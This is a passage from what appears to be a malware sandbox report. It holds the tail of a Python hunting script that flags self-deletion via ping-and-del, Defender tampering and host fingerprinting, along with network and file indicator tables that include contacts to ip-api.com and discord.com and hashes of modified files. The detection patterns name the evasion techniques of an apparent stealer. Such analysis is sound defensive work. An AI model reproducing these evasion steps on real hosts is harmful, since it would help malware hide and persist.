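            if image.endswith("cmd.exe") and "ping" in low and "del " in low and parent_image in low:
                findings.append(("self_delete_after_ping", c["pid"], parent_image))
        if len(fingerprints) >= 3:
            findings.append(("host_fingerprinting", ppid, sorted(fingerprints)))
        if findings:
            report[ppid] = findings
    return report


if __name__ == "__main__":
    for ppid, findings in hunt(SAMPLE_EVENTS).items():
        print(f"parent pid {ppid}:")
        for rule, pid, detail in findings:
            print(f"  {rule:24} pid={pid} {detail}")
```

The correlation is per parent rather than per event on purpose: each wmic query on its own is routine administration, and a single Set-MpPreference could be a legitimate policy change, but one parent that fingerprints the host, hides and excludes its own image, turns off several Defender features and then deletes itself is the chain this report records. Parsing the switches also gives responders a concrete list of settings to re-enable on the affected host.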
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| GB | 172.217.16.238:443 | apis.google.com | tcp |
| GB | 172.217.169.46:443 | play.google.com | tcp |
| GB | 142.250.187.206:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 172.217.16.238:443 | apis.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| GB | 142.250.187.206:443 | clients2.google.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
Files
memory/436-0-0x000001C8B84D0000-0x000001C8B8510000-memory.dmp
memory/436-1-0x00007FF971813000-0x00007FF971815000-memory.dmp
memory/436-2-0x00007FF971810000-0x00007FF9722D2000-memory.dmp
memory/5112-3-0x00007FF971810000-0x00007FF9722D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q04zb405.vv3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5112-12-0x000001CFCA9E0000-0x000001CFCAA02000-memory.dmp
memory/5112-14-0x00007FF971810000-0x00007FF9722D2000-memory.dmp
memory/5112-13-0x00007FF971810000-0x00007FF9722D2000-memory.dmp
memory/5112-17-0x00007FF971810000-0x00007FF9722D2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 627073ee3ca9676911bee35548eff2b8 |
| SHA1 | 4c4b68c65e2cab9864b51167d710aa29ebdcff2e |
| SHA256 | 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c |
| SHA512 | 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1a9fa92a4f2e2ec9e244d43a6a4f8fb9 |
| SHA1 | 9910190edfaccece1dfcc1d92e357772f5dae8f7 |
| SHA256 | 0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888 |
| SHA512 | 5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64 |
memory/436-31-0x000001C8D2D20000-0x000001C8D2D96000-memory.dmp
memory/436-32-0x000001C8BA5B0000-0x000001C8BA600000-memory.dmp
memory/436-33-0x000001C8BA430000-0x000001C8BA44E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fa21dd50b4e64421076f843031c8ccf7 |
| SHA1 | 2c56e94f130c0d8d77116e939ffee4e37cf982bd |
| SHA256 | e4f21aca1e12aafa8de7af24b79a75526e902c7d4b3fea5bdb6e723976997be3 |
| SHA512 | b8de2bfeb7af06c587dd1f424d410cf83471f31a55a3ea4c4481ce07ffd9bf66ddc1f7775ecd6ac65ac33baaec90ba5a208a9aefc84f31125a50dfb919982687 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7332074ae2b01262736b6fbd9e100dac |
| SHA1 | 22f992165065107cc9417fa4117240d84414a13c |
| SHA256 | baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa |
| SHA512 | 4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2 |
memory/436-67-0x000001C8BA590000-0x000001C8BA59A000-memory.dmp
memory/436-68-0x000001C8BA620000-0x000001C8BA632000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 17d36e2871735da5dc714f2989e25f06 |
| SHA1 | 15fd7420c63c69cc5c543c1dd51bbd85a32802b5 |
| SHA256 | 815e7a726cf6bb33f206036ed3e65db8cb93857375275aca95212d6e6ce143e6 |
| SHA512 | edf49d1499f99f7eade0ec9c9459bb82629059b1bec78dca5a7df465a78c9b4d026c4c0da7c7be590606dba96402d9cc2186b305f4f994dd85a3d291e3d2d5e8 |
memory/436-85-0x00007FF971810000-0x00007FF9722D2000-memory.dmp
C:\Windows\system32\drivers\etc\hosts
| MD5 | 4028457913f9d08b06137643fe3e01bc |
| SHA1 | a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14 |
| SHA256 | 289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58 |
| SHA512 | c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b |
\??\pipe\crashpad_1960_AUFSMNZCICDODERF
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 9f0dcb2b1fd587d3bafb9c701e3621b2 |
| SHA1 | c068494c557eb2908340323d012f83d53532e958 |
| SHA256 | 74da2cad6e8d068cc4ffd5a5cef007c79b77bb50e733a94c3c7b8fbf05b8222e |
| SHA512 | 0e05bd50db1c1b927c7afbf809318fec7ac287f53f4a84746a1a379e156634ba7af8fcc10e6e0db6139ef7a5334bd75dc8a674bbaf47b7af8ed55788c6bc1842 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | b626c6c9304f060bfe8fdb0aa25ef743 |
| SHA1 | 4ce08b0288518f1c88617155c9b84a242060dbca |
| SHA256 | 0b23f01218f70cc7d91a334543e1fc3434db31feeb6b8b5c59c0f80f2b770162 |